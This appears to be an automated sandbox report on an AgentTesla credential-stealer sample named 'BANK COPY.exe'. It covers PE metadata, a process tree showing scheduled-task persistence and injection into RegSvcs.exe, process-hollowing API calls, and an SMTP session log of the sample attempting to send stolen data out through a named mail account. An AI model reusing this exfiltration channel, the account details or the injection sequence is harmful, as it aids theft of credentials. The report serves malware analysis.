                                                                                                  SHA1:068261f9991202b0a75d813f0c25267d28e4fb51
                                                                                                  SHA256:54877cf2e0d27d13a5e94fcfb0eae5749bfc56e0e2f548f6410e6e4d56f3ea3f
                                                                                                  SHA512:8223327ee59d6b93ce6ca2b916dc1583857a66bdf1b4777bd6855c46c3e27563f260cf89138128e7df60286867ccc39e92734df82d89c0659d835e30f2192c05
                                                                                                  SSDEEP:12288:1lEsuE02iN2UP3L/2+vCU48RXnnYph89YSrHp1S+tzTyy+dT9Z25MqT:4V18UfL5vO8R3YpuYSrHLSozTyJ9Zk
                                                                                                  TLSH:7F05F1F06AF97668F035637636D0A03C3BE2E90BD905E1399DA7934D9752EC046E1A33
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..b..............P......$......z&... ...@....@.. ....................................@................................
                                                                                                  Icon Hash:0220839690409040
                                                                                                  Entrypoint:0x4c267a
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x62F10A3F [Mon Aug 8 13:06:07 2022 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:4
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:4
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:4
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                  Instruction
                                                                                                  jmp dword ptr [00402000h]
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  add byte ptr [eax], al
                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc26280x4f.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x2044.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xc80000xc.reloc
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x20000xc06800xc0800False0.8528168120941558data7.749151091847694IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rsrc0xc40000x20440x2200False0.8245634191176471data7.364406728241504IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .reloc0xc80000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                  RT_ICON0xc41300x19efPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                  RT_GROUP_ICON0xc5b200x14data
                                                                                                  RT_VERSION0xc5b340x324data
                                                                                                  RT_MANIFEST0xc5e580x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                  DLLImport
                                                                                                  mscoree.dll_CorExeMain
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Aug 8, 2022 19:55:48.572746038 CEST49752587192.168.2.3162.241.217.198
                                                                                                  Aug 8, 2022 19:55:48.714828014 CEST58749752162.241.217.198192.168.2.3
                                                                                                  Aug 8, 2022 19:55:48.715018034 CEST49752587192.168.2.3162.241.217.198
                                                                                                  Aug 8, 2022 19:55:48.959501982 CEST58749752162.241.217.198192.168.2.3
                                                                                                  Aug 8, 2022 19:55:48.988403082 CEST49752587192.168.2.3162.241.217.198
                                                                                                  Aug 8, 2022 19:55:49.130188942 CEST58749752162.241.217.198192.168.2.3
                                                                                                  Aug 8, 2022 19:55:49.131726980 CEST49752587192.168.2.3162.241.217.198
                                                                                                  Aug 8, 2022 19:55:49.273731947 CEST58749752162.241.217.198192.168.2.3
                                                                                                  Aug 8, 2022 19:55:49.274251938 CEST49752587192.168.2.3162.241.217.198
                                                                                                  Aug 8, 2022 19:55:49.455485106 CEST58749752162.241.217.198192.168.2.3
                                                                                                  Aug 8, 2022 19:55:49.456295967 CEST49752587192.168.2.3162.241.217.198
                                                                                                  Aug 8, 2022 19:55:49.597950935 CEST58749752162.241.217.198192.168.2.3
                                                                                                  Aug 8, 2022 19:55:49.598197937 CEST49752587192.168.2.3162.241.217.198
                                                                                                  Aug 8, 2022 19:55:49.751415014 CEST58749752162.241.217.198192.168.2.3
                                                                                                  Aug 8, 2022 19:55:49.820390940 CEST49752587192.168.2.3162.241.217.198
                                                                                                  Aug 8, 2022 19:55:49.963474035 CEST58749752162.241.217.198192.168.2.3
                                                                                                  Aug 8, 2022 19:55:49.963519096 CEST58749752162.241.217.198192.168.2.3
                                                                                                  Aug 8, 2022 19:55:49.963586092 CEST49752587192.168.2.3162.241.217.198
                                                                                                  Aug 8, 2022 19:55:49.963629961 CEST49752587192.168.2.3162.241.217.198
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Aug 8, 2022 19:55:48.381268978 CEST5772353192.168.2.38.8.8.8
                                                                                                  Aug 8, 2022 19:55:48.529407978 CEST53577238.8.8.8192.168.2.3
                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                  Aug 8, 2022 19:55:48.381268978 CEST192.168.2.38.8.8.80x2e54Standard query (0)mail.absheron-sharab.azA (IP address)IN (0x0001)
                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                  Aug 8, 2022 19:55:48.529407978 CEST8.8.8.8192.168.2.30x2e54No error (0)mail.absheron-sharab.az162.241.217.198A (IP address)IN (0x0001)
                                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                  Aug 8, 2022 19:55:48.959501982 CEST58749752162.241.217.198192.168.2.3220-box5507.bluehost.com ESMTP Exim 4.95 #2 Mon, 08 Aug 2022 11:55:48 -0600
                                                                                                  220-We do not authorize the use of this system to transport unsolicited,
                                                                                                  220 and/or bulk e-mail.
                                                                                                  Aug 8, 2022 19:55:48.988403082 CEST49752587192.168.2.3162.241.217.198EHLO 835180
                                                                                                  Aug 8, 2022 19:55:49.130188942 CEST58749752162.241.217.198192.168.2.3250-box5507.bluehost.com Hello 835180 [102.129.143.3]
                                                                                                  250-SIZE 52428800
                                                                                                  250-8BITMIME
                                                                                                  250-PIPELINING
                                                                                                  250-PIPE_CONNECT
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-STARTTLS
                                                                                                  250 HELP
                                                                                                  Aug 8, 2022 19:55:49.131726980 CEST49752587192.168.2.3162.241.217.198AUTH login ZW1pbi5nYXNpbW92QGFic2hlcm9uLXNoYXJhYi5heg==
                                                                                                  Aug 8, 2022 19:55:49.273731947 CEST58749752162.241.217.198192.168.2.3334 UGFzc3dvcmQ6
                                                                                                  Aug 8, 2022 19:55:49.455485106 CEST58749752162.241.217.198192.168.2.3235 Authentication succeeded
                                                                                                  Aug 8, 2022 19:55:49.456295967 CEST49752587192.168.2.3162.241.217.198MAIL FROM:<emin.gasimov@absheron-sharab.az>
                                                                                                  Aug 8, 2022 19:55:49.597950935 CEST58749752162.241.217.198192.168.2.3250 OK
                                                                                                  Aug 8, 2022 19:55:49.598197937 CEST49752587192.168.2.3162.241.217.198RCPT TO:<zakirrome@ostdubai.com>
                                                                                                  Aug 8, 2022 19:55:49.751415014 CEST58749752162.241.217.198192.168.2.3550-Domain absheron-sharab.az has exceeded the max emails per hour (150/150
                                                                                                  550 (100%)) allowed. Message discarded.
                                                                                                  Aug 8, 2022 19:55:49.963474035 CEST58749752162.241.217.198192.168.2.3421 box5507.bluehost.com lost input connection

                                                                                                  Click to jump to process

                                                                                                  Click to jump to process

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:0
                                                                                                  Start time:19:55:06
                                                                                                  Start date:08/08/2022
                                                                                                  Path:C:\Users\user\Desktop\BANK COPY.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\BANK COPY.exe"
                                                                                                  Imagebase:0x780000
                                                                                                  File size:798208 bytes
                                                                                                  MD5 hash:0197C423EDDEB8A0ED293E96A152F5A2
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.290430667.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.290430667.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.290430667.0000000003BF9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:low

                                                                                                  Target ID:5
                                                                                                  Start time:19:55:24
                                                                                                  Start date:08/08/2022
                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gPxsznxm" /XML "C:\Users\user\AppData\Local\Temp\tmp1205.tmp
                                                                                                  Imagebase:0x7ff7c9170000
                                                                                                  File size:185856 bytes
                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Target ID:6
                                                                                                  Start time:19:55:25
                                                                                                  Start date:08/08/2022
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7c9170000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Target ID:7
                                                                                                  Start time:19:55:25
                                                                                                  Start date:08/08/2022
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:{path}
                                                                                                  Imagebase:0xdb0000
                                                                                                  File size:45152 bytes
                                                                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000000.280231622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000000.280231622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000007.00000000.280231622.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.512101132.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.512101132.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:high

                                                                                                  Target ID:14
                                                                                                  Start time:19:55:39
                                                                                                  Start date:08/08/2022
                                                                                                  Path:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                                                                                                  Imagebase:0x6e0000
                                                                                                  File size:45152 bytes
                                                                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 0%, Metadefender, Browse
                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                  Reputation:high

                                                                                                  Target ID:15
                                                                                                  Start time:19:55:39
                                                                                                  Start date:08/08/2022
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7c9170000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Target ID:20
                                                                                                  Start time:19:55:48
                                                                                                  Start date:08/08/2022
                                                                                                  Path:C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe"
                                                                                                  Imagebase:0x3b0000
                                                                                                  File size:45152 bytes
                                                                                                  MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                  Reputation:high

                                                                                                  Target ID:22
                                                                                                  Start time:19:55:48
                                                                                                  Start date:08/08/2022
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7c9170000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:11.8%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:1.9%
                                                                                                    Total number of Nodes:158
                                                                                                    Total number of Limit Nodes:5
                                                                                                    execution_graph 19978 8020283 19979 80200b8 19978->19979 19980 802027c 19979->19980 19983 8021658 19979->19983 19987 802164c 19979->19987 19984 80216d7 CreateProcessW 19983->19984 19986 80217c0 19984->19986 19986->19986 19988 80216d7 CreateProcessW 19987->19988 19990 80217c0 19988->19990 20059 8020360 20061 80219c0 SetThreadContext 20059->20061 20062 80219c8 SetThreadContext 20059->20062 20060 8020371 20061->20060 20062->20060 19991 8020c01 19995 80219c0 19991->19995 19999 80219c8 19991->19999 19992 8020c12 19997 80219c7 SetThreadContext 19995->19997 19998 8021a4e 19997->19998 19998->19992 20000 8021a10 SetThreadContext 19999->20000 20002 8021a4e 20000->20002 20002->19992 20003 80211d2 20007 8021c00 20003->20007 20011 8021bf8 20003->20011 20004 80211ea 20008 8021c4b WriteProcessMemory 20007->20008 20010 8021c9c 20008->20010 20010->20004 20012 8021c4b WriteProcessMemory 20011->20012 20014 8021c9c 20012->20014 20014->20004 20015 8021213 20019 8021db1 20015->20019 20022 8021db8 20015->20022 20016 802121e 20020 8021df9 ResumeThread 20019->20020 20021 8021e26 20020->20021 20021->20016 20023 8021df9 ResumeThread 20022->20023 20024 8021e26 20023->20024 20024->20016 20025 80206d0 20027 8021c00 WriteProcessMemory 20025->20027 20028 8021bf8 WriteProcessMemory 20025->20028 20026 80206ea 20027->20026 20028->20026 20063 80224b0 20064 802263b 20063->20064 20065 80224d6 20063->20065 20065->20064 20068 8022730 PostMessageW 20065->20068 20070 8022728 20065->20070 20069 802279c 20068->20069 20069->20065 20071 8022730 PostMessageW 20070->20071 20072 802279c 20071->20072 20072->20065 20073 75bbf68 20074 75bbfb0 VirtualProtect 20073->20074 20075 75bbfea 20074->20075 20076 8020f77 20077 8020f7d 20076->20077 20081 8021b58 20077->20081 20084 8021b50 20077->20084 20078 8020fa3 20082 8021b9b VirtualAllocEx 20081->20082 20083 8021bd2 20082->20083 20083->20078 20085 8021b9b VirtualAllocEx 20084->20085 20086 8021bd2 20085->20086 20086->20078 20087 2ad6b58 20088 2ad6b68 20087->20088 20091 2ad66bc 20088->20091 20090 2ad6b75 20092 2ad66c7 20091->20092 20095 2ad66dc 20092->20095 20094 2ad6c25 20094->20090 20096 2ad66e7 20095->20096 20099 2ad670c 20096->20099 20098 2ad6d02 20098->20094 20100 2ad6717 20099->20100 20103 2ad673c 20100->20103 20102 2ad6e02 20102->20098 20104 2ad6747 20103->20104 20106 2ad751e 20104->20106 20110 2ad9658 20104->20110 20105 2ad755c 20105->20102 20106->20105 20114 2adb7a8 20106->20114 20119 2adb798 20106->20119 20124 2ad9680 20110->20124 20127 2ad9690 20110->20127 20111 2ad966e 20111->20106 20115 2adb7c9 20114->20115 20116 2adb7ed 20115->20116 20150 2adb949 20115->20150 20154 2adb958 20115->20154 20116->20105 20121 2adb7a8 20119->20121 20120 2adb7ed 20120->20105 20121->20120 20122 2adb949 2 API calls 20121->20122 20123 2adb958 2 API calls 20121->20123 20122->20120 20123->20120 20130 2ad9788 20124->20130 20125 2ad969f 20125->20111 20128 2ad969f 20127->20128 20129 2ad9788 2 API calls 20127->20129 20128->20111 20129->20128 20131 2ad979b 20130->20131 20133 2ad97b3 20131->20133 20138 2ad9a10 20131->20138 20142 2ad9a02 20131->20142 20132 2ad97ab 20132->20133 20134 2ad99b0 GetModuleHandleW 20132->20134 20133->20125 20135 2ad99dd 20134->20135 20135->20125 20139 2ad9a24 20138->20139 20140 2ad9a49 20139->20140 20146 2ad8af8 20139->20146 20140->20132 20143 2ad9a10 20142->20143 20144 2ad9a49 20143->20144 20145 2ad8af8 LoadLibraryExW 20143->20145 20144->20132 20145->20144 20147 2ad9bf0 LoadLibraryExW 20146->20147 20149 2ad9c69 20147->20149 20149->20140 20151 2adb952 20150->20151 20152 2adb99f 20151->20152 20158 2ada47c 20151->20158 20152->20116 20155 2adb965 20154->20155 20156 2adb99f 20155->20156 20157 2ada47c 2 API calls 20155->20157 20156->20116 20157->20156 20159 2ada487 20158->20159 20161 2adc698 20159->20161 20162 2adbc94 20159->20162 20161->20161 20163 2adbc9f 20162->20163 20164 2ad673c 2 API calls 20163->20164 20165 2adc707 20164->20165 20169 2ade490 20165->20169 20175 2ade478 20165->20175 20166 2adc740 20166->20161 20171 2ade50e 20169->20171 20172 2ade4c1 20169->20172 20170 2ade4cd 20170->20166 20171->20166 20172->20170 20180 2ade7c8 20172->20180 20184 2ade7d8 20172->20184 20177 2ade490 20175->20177 20176 2ade4cd 20176->20166 20177->20176 20178 2ade7c8 2 API calls 20177->20178 20179 2ade7d8 2 API calls 20177->20179 20178->20176 20179->20176 20181 2ade7d8 20180->20181 20182 2ad9788 LoadLibraryExW GetModuleHandleW 20181->20182 20183 2ade7e1 20182->20183 20183->20171 20185 2ad9788 LoadLibraryExW GetModuleHandleW 20184->20185 20186 2ade7e1 20185->20186 20186->20171 20033 2adba70 20034 2adbad6 20033->20034 20038 2adc028 20034->20038 20042 2adc038 20034->20042 20035 2adbb85 20039 2adc038 20038->20039 20045 2ada4dc 20039->20045 20043 2ada4dc DuplicateHandle 20042->20043 20044 2adc066 20043->20044 20044->20035 20046 2adc0a0 DuplicateHandle 20045->20046 20047 2adc066 20046->20047 20047->20035 20048 802051c 20052 8021a81 20048->20052 20056 8021a88 20048->20056 20049 8020534 20053 8021a87 ReadProcessMemory 20052->20053 20055 8021b16 20053->20055 20055->20049 20057 8021ad3 ReadProcessMemory 20056->20057 20058 8021b16 20057->20058 20058->20049

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 75b2d00-75b2d27 2 75b2d89-75b2da9 0->2 3 75b2d29-75b2d36 0->3 6 75b2daf-75b2dc1 2->6 7 75b2e7e-75b2e81 2->7 3->2 4 75b2d38-75b2d88 3->4 11 75b2dc3-75b2dc6 6->11 12 75b2dd6-75b2dd9 6->12 16 75b2e4b-75b2e51 11->16 17 75b2dcc-75b2dcf 11->17 14 75b2ddb-75b2dde 12->14 15 75b2de9-75b2def 12->15 18 75b2e7a-75b2e7c 14->18 19 75b2de4 14->19 20 75b2df1-75b2df3 15->20 21 75b2df5-75b2e01 15->21 22 75b2e53-75b2e55 16->22 23 75b2e57-75b2e63 16->23 24 75b2e1a-75b2e20 17->24 25 75b2dd1 17->25 18->7 29 75b2e82-75b2f04 18->29 19->18 27 75b2e03-75b2e18 20->27 21->27 28 75b2e65-75b2e78 22->28 23->28 30 75b2e22-75b2e24 24->30 31 75b2e26-75b2e32 24->31 25->18 27->18 28->18 49 75b2f1c-75b2f24 29->49 50 75b2f06-75b2f0c 29->50 34 75b2e34-75b2e49 30->34 31->34 34->18 53 75b2f2a-75b2f2c 49->53 54 75b30d0-75b30d2 49->54 51 75b2f0e 50->51 52 75b2f10-75b2f1a 50->52 51->49 52->49 53->54 57 75b2f32-75b2f36 53->57 55 75b30dc-75b30e3 54->55 56 75b30d4-75b30d9 54->56 56->55 59 75b2f3c-75b2f44 57->59 60 75b3020-75b3028 57->60 59->54 61 75b2f4a-75b2f4e 59->61 60->54 62 75b302e-75b3032 60->62 63 75b2f8b-75b2f9e 61->63 64 75b2f50-75b2f5f 61->64 65 75b306c-75b307b 62->65 66 75b3034-75b3043 62->66 63->54 71 75b2fa4 63->71 64->54 72 75b2f65-75b2f68 64->72 65->54 74 75b307d-75b3080 65->74 66->54 73 75b3049-75b304c 66->73 75 75b2fa7-75b2fad 71->75 76 75b2f6b-75b2f6e 72->76 77 75b304f-75b3052 73->77 78 75b3083-75b308c 74->78 79 75b30eb-75b311a 75->79 80 75b2fb3-75b2fb9 75->80 76->79 81 75b2f74-75b2f7c 76->81 77->79 82 75b3058-75b3060 77->82 78->79 83 75b308e-75b3093 78->83 100 75b311c-75b311e 79->100 101 75b3123-75b312f 79->101 84 75b2fbb-75b2fcb 80->84 85 75b300d-75b3010 80->85 86 75b2f82-75b2f84 81->86 87 75b30e6 81->87 82->87 88 75b3066-75b3068 82->88 89 75b30c7-75b30ca 83->89 90 75b3095-75b309b 83->90 84->85 104 75b2fcd-75b2fd9 84->104 85->87 95 75b3016-75b3019 85->95 86->76 93 75b2f86 86->93 87->79 88->77 94 75b306a 88->94 89->87 92 75b30cc-75b30ce 89->92 90->79 91 75b309d-75b30a5 90->91 91->79 97 75b30a7-75b30ad 91->97 92->54 92->78 93->54 94->54 95->75 99 75b301b 95->99 97->89 103 75b30af-75b30ba 97->103 99->54 102 75b31f6-75b31fb 100->102 108 75b3138-75b314d 101->108 109 75b3131-75b3133 101->109 103->79 106 75b30bc-75b30c0 103->106 104->79 107 75b2fdf-75b2fe7 104->107 106->89 107->79 110 75b2fed-75b2ffc 107->110 114 75b314f-75b315a 108->114 115 75b3161-75b316d 108->115 109->102 110->79 111 75b3002-75b3006 110->111 111->85 114->115 118 75b317a-75b317c 115->118 119 75b316f-75b3178 115->119 120 75b317e-75b318a 118->120 121 75b318c-75b3190 118->121 119->118 120->121 126 75b31a2-75b31ac 120->126 123 75b319e-75b31a0 121->123 124 75b3192-75b319c 121->124 123->102 128 75b3208-75b3214 124->128 131 75b31ae-75b31ba 126->131 132 75b31fc-75b3206 126->132 133 75b3221-75b3223 128->133 134 75b3216-75b321f 128->134 137 75b31cc-75b31ce 131->137 138 75b31bc-75b31ca 131->138 132->128 133->102 134->102 137->102 138->137 141 75b31d0-75b31d6 138->141 142 75b31da 141->142 143 75b31d8 141->143 144 75b31dc-75b31de 142->144 143->144 145 75b31e0-75b31ec 144->145 146 75b3225-75b32ba 144->146 145->146 149 75b31ee 145->149 159 75b32bc 146->159 160 75b32c1-75b32c3 146->160 149->102 159->160 171 75b32c6 call 75b369d 160->171 172 75b32c6 call 75b3630 160->172 173 75b32c6 call 75b3c14 160->173 161 75b32cc 162 75b32d3-75b32ef 161->162 163 75b32f8-75b32f9 162->163 164 75b32f1 162->164 166 75b3315 call 75b9ac4 163->166 164->161 164->163 165 75b32fb-75b3313 call 75b93dd 164->165 164->166 165->162 168 75b331b-75b331f 166->168 171->161 172->161 173->161
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.312255424.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
